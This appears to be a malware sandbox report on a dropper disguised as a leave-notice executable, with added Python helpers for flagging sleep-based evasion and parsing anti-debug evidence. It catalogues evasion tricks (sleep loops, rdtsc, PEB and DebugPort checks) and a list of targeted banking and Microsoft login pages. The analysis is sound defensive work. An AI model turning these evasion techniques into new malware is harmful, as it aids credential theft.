Source: Binary string: Utilman.pdb | source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: eAdBvdCMNQkVZK.exe, 00000004.00000000.2397251111.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4579697275.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Utilman.pdbGCTL | source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F9E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FA6B05 push ecx; ret 0_2_00FA6B18
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_01A4DBF4 push ecx; iretd 0_2_01A4DC52
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004050D7 push cs; iretd 2_2_004050D8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160FE push esp; iretd 2_2_0041611F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403160 push eax; ret 2_2_00403162
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004141D4 pushad ; iretd 2_2_0041429E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414257 pushad ; iretd 2_2_0041429E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00412318 push ebx; iretd 2_2_00412321
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041845E push es; retf 2_2_0041845F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413E23 push edi; iretd 2_2_00413E2D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017E2 push ds; retf 2_2_0040180A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A7F3 push eax; ret 2_2_0040A80E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413F90 push ss; retf 2_2_00413F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390283D push eax; iretd 2_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03901368 push eax; iretd 2_2_03901369
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | File created: \mandatory notice for all december leave and vacation application.exe
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FE8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F9EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FA123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress (x30)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Process information set: NOOPENFILEERRORBOX (reported 2 times)
Source: C:\Windows\SysWOW64\Utilman.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 5 times)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | API/Special instruction interceptor: Address: 1A4D014
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\Utilman.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc
Source: C:\Windows\SysWOW64\Utilman.exe | Window / User API: threadDelayed 2236
Source: C:\Windows\SysWOW64\Utilman.exe | Window / User API: threadDelayed 7737
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Evaded block: after key decision (graph_0-95115)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-95653)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748 | Thread sleep count: 2236 > 30
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748 | Thread sleep time: -4472000s >= -30000s
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748 | Thread sleep count: 7737 > 30
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748 | Thread sleep time: -15474000s >= -30000s
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe TID: 5244 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\Utilman.exe | Last function: Thread delayed (reported 2 times)
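The sleep signatures above are the report's evidence for delay-based sandbox evasion: one Utilman.exe thread (TID 3748) sleeps 2236 and then 7737 times, and both totals divide exactly by their call counts to 2000 (4472000 / 2236 and 15474000 / 7737), which only makes sense as one Sleep(2000) per call with the totals in milliseconds, whatever the report's "s" suffix says; the eAdBvdCMNQkVZK.exe line for TID 5244 is consistent with a single 30000 ms delay. The following is an added example, not part of the Joe Sandbox report, showing how the two thresholds the report prints (more than 30 calls, or 30000 ms cumulative per thread) are applied to an API trace. The trace line format and the process IDs are this example's own; the thread IDs and counts are taken from the report, and the NtDelayExecution handling (100-ns units, negative meaning relative) is the documented Windows convention.

```python
"""Per-thread sleep accounting for sandbox-evasion triage (added example)."""
import re
from collections import defaultdict

# Constructed trace line format: "<pid>:<tid> <api>(<arg>)".
LINE = re.compile(r"^(?P<pid>\d+):(?P<tid>\d+)\s+(?P<api>\w+)\((?P<arg>-?\d+)\)$")


def delay_ms(api, arg):
    """Normalise one sleep-style call to milliseconds.

    Sleep/SleepEx take milliseconds. NtDelayExecution takes a LARGE_INTEGER in
    100-ns units: negative is a relative delay, non-negative an absolute time,
    which is not a delay we can attribute without a clock reference.
    """
    if api in ("Sleep", "SleepEx"):
        return max(arg, 0)
    if api == "NtDelayExecution":
        return abs(arg) / 10_000 if arg < 0 else 0
    return 0


def per_thread_delays(lines):
    """Aggregate sleep call count and cumulative delay per (pid, tid)."""
    stats = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not a call we account for
        ms = delay_ms(m["api"], int(m["arg"]))
        if ms == 0:
            continue
        key = (int(m["pid"]), int(m["tid"]))
        stats[key]["count"] += 1
        stats[key]["total_ms"] += ms
    return dict(stats)


def flag_sleep_evasion(lines, max_calls=30, max_total_ms=30_000):
    """Return {(pid, tid): reasons} for threads over either report threshold."""
    verdicts = {}
    for key, s in per_thread_delays(lines).items():
        reasons = []
        if s["count"] > max_calls:
            reasons.append(f"sleep count {s['count']} > {max_calls}")
        if s["total_ms"] >= max_total_ms:
            reasons.append(f"sleep time {s['total_ms']:.0f} ms >= {max_total_ms} ms")
        if reasons:
            verdicts[key] = reasons
    return verdicts


# Constructed trace replaying the report's first Utilman.exe figure: TID 3748
# makes 2236 two-second sleeps (4,472,000 ms); TID 5244 of eAdBvdCMNQkVZK.exe
# makes a single 30 s relative NtDelayExecution; a benign thread makes three
# short sleeps that must not be flagged. PIDs 6000/6100/6200 are invented.
TRACE = (
    ["6000:3748 Sleep(2000)"] * 2236
    + ["6100:5244 NtDelayExecution(-300000000)"]
    + ["6200:1111 Sleep(100)"] * 3
)

if __name__ == "__main__":
    for (pid, tid), reasons in sorted(flag_sleep_evasion(TRACE).items()):
        print(f"pid {pid} tid {tid}: " + "; ".join(reasons))
```

Accounting per thread rather than per process is what makes the count threshold meaningful: 2236 short sleeps from one thread are a stalling loop, while the same number spread over a GUI process's worker threads would be unremarkable. A sandbox that patches Sleep to return immediately defeats the loop but not an rdtsc-based check like the one reported for svchost.exe above, which is why the two signatures are listed side by side.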
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC6CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf (x7)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCF56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F9DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: 40473HJ96.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 40473HJ96.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 40473HJ96.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 40473HJ96.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4580229610.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 40473HJ96.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 40473HJ96.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 40473HJ96.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 40473HJ96.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2810654551.00000193F1E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40473HJ96.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 40473HJ96.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 40473HJ96.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,11696428655f
                Source: 40473HJ96.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 40473HJ96.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 40473HJ96.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 40473HJ96.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 40473HJ96.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 40473HJ96.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 40473HJ96.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI call chain: ExitProcess graph end nodegraph_0-94507
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI call chain: ExitProcess graph end nodegraph_0-95405
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177C3 LdrLoadDll,2_2_004177C3
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD6AAF BlockInput,0_2_00FD6AAF
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F83D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83D19
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00FB3920
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9E01E LoadLibraryA,GetProcAddress,0_2_00F9E01E
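The evidence rows in this section are the flattened form of a three-column table (source, evidence kind, value), and the anti-debug part of it is repetitive: one row per PEB read (mov reg, dword ptr fs:[00000030h]) in the injected svchost.exe, one per anti-debug API in the dropper, plus the runtime DebugPort queries. The Python below is an added triage helper written for this page; it is not code from Joe Sandbox or from the FormBook sample. It recovers the three columns, drops the duplicated trailing function id and the "Jump to behavior" link text, counts PEB reads per function and register, collects the user-mode anti-debug indicators, and lists the login-page titles and hosts that precede the marker VMware20,11696428655 in the dropped file's strings. The regexes, the ANTI_DEBUG_APIS set and the sample rows (constructed, with a shortened lure filename) are assumptions of the example, not fields of the report.

```python
"""Triage helper for flattened Joe Sandbox evidence rows (added example, not report code).

Assumed row shape: 'Source: <source><kind>: <value>' where <kind> is one of KINDS and
the source path is fused to the kind label. Code-function values end with a repeat of
their own function id (the report's link column); some values end in link text.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed sample rows in the report's flattened form (lure filename shortened).
SAMPLE_ROWS = """\
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
Source: C:\\Windows\\SysWOW64\\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\\Users\\user\\Desktop\\lure.exeCode function: 0_2_00F83D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,0_2_00F83D19
Source: C:\\Users\\user\\Desktop\\lure.exeCode function: 0_2_00FD6AAF BlockInput,0_2_00FD6AAF
Source: 40473HJ96.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 40473HJ96.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
"""

KINDS = ("Code function", "Binary or memory string", "Process queried",
         "Process information queried", "Last function", "API call chain")
ROW_RE = re.compile(r"^Source:\s*(?P<source>.+?)(?P<kind>" + "|".join(KINDS) + r"):\s*(?P<value>.*)$")
# '<id> <body><id>': the trailing id is the report's link column and carries no extra data.
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s+(?P<body>.*?)\s*(?P=fid)?$")
# fs:[30h] in 32-bit code is the TEB's PEB pointer; one match per PEB read.
PEB_RE = re.compile(r"^mov\s+(?P<reg>e[a-d]x|e[sd]i|e[bs]p),\s*dword ptr fs:\[00000030h\]$")
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW",
                   "OutputDebugStringA", "BlockInput", "NtQueryInformationProcess"}  # assumption
TIMING_INSNS = {"rdtsc"}
INTERACTIVE_RESIDUE = ("Jump to behavior",)


def parse_rows(text: str) -> List[Dict[str, str]]:
    """Split each flattened row into source / kind / value; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        value = m["value"]
        for residue in INTERACTIVE_RESIDUE:  # strip link text left over from extraction
            if value.endswith(residue):
                value = value[: -len(residue)]
        rows.append({"source": m["source"], "kind": m["kind"], "value": value.strip()})
    return rows


def split_code_function(value: str) -> Tuple[str, str]:
    """Return (function id, instruction or API chain) with the duplicated trailing id removed."""
    m = FUNC_RE.match(value)
    if not m:
        return "", value
    return m["fid"], m["body"].rstrip(", ")


def peb_reads_per_function(rows) -> Dict[Tuple[str, str], Counter]:
    """Count PEB pointer reads per (source, function id), broken down by destination register."""
    counts: Dict[Tuple[str, str], Counter] = defaultdict(Counter)
    for row in rows:
        if row["kind"] != "Code function":
            continue
        fid, body = split_code_function(row["value"])
        m = PEB_RE.match(body)
        if m:
            counts[(row["source"], fid)][m["reg"]] += 1
    return dict(counts)


def anti_debug_hits(rows) -> Dict[str, List[str]]:
    """Map function id (or 'runtime' for behaviour rows) to the anti-debug indicators found in it."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for row in rows:
        if row["kind"] == "Code function":
            fid, body = split_code_function(row["value"])
            for item in body.split(","):
                item = item.strip()
                if item in ANTI_DEBUG_APIS or item in TIMING_INSNS:
                    hits[fid].append(item)
        elif row["kind"] == "Process queried" and row["value"] == "DebugPort":
            hits["runtime"].append("ProcessDebugPort")  # NtQueryInformationProcess observed at runtime
    return dict(hits)


def strings_before_marker(rows, source: str, marker: str) -> List[str]:
    """Titles/hosts that precede `marker` in a source's strings; bytes after the marker are discarded."""
    out = []
    for row in rows:
        if row["source"] == source and row["kind"] == "Binary or memory string" and marker in row["value"]:
            out.append(row["value"].split(marker, 1)[0])
    return out


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for (src, fid), regs in peb_reads_per_function(rows).items():
        print(f"{src.rsplit(chr(92), 1)[-1]} {fid}: PEB reads {dict(regs)}")
    print("anti-debug:", anti_debug_hits(rows))
    print("targets:", strings_before_marker(rows, "40473HJ96.5.dr", "VMware20,11696428655"))
```

Two reading caveats, both analyst interpretation rather than findings the report states: the file-handling functions at 0_2_00FC... in the dropper (FindFirstFileW/FindNextFileW with _wsplitpath, CopyFileW, MoveFileW) look like the AutoIt runtime's own file routines, since the report classifies the binary as a compiled AutoIt script, so they show what the interpreter can do rather than what this script does; and the VMware-marker rows come from a file the sample dropped (40473HJ96.5.dr) in which every string pairs a banking, brokerage or Microsoft login page with the same marker, which fits the browser-credential harvesting signature better than VM detection in the sample's own code. A fs:[30h] read only fetches the PEB pointer, which serves both the BeingDebugged/NtGlobalFlag checks and walking the loader's module list to resolve APIs without imports; static rows cannot tell these apart, so correlate them with the Process queried: DebugPort rows, which record an actual runtime check.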
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_01A4D280 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_01A4D2E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_01A4BC50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
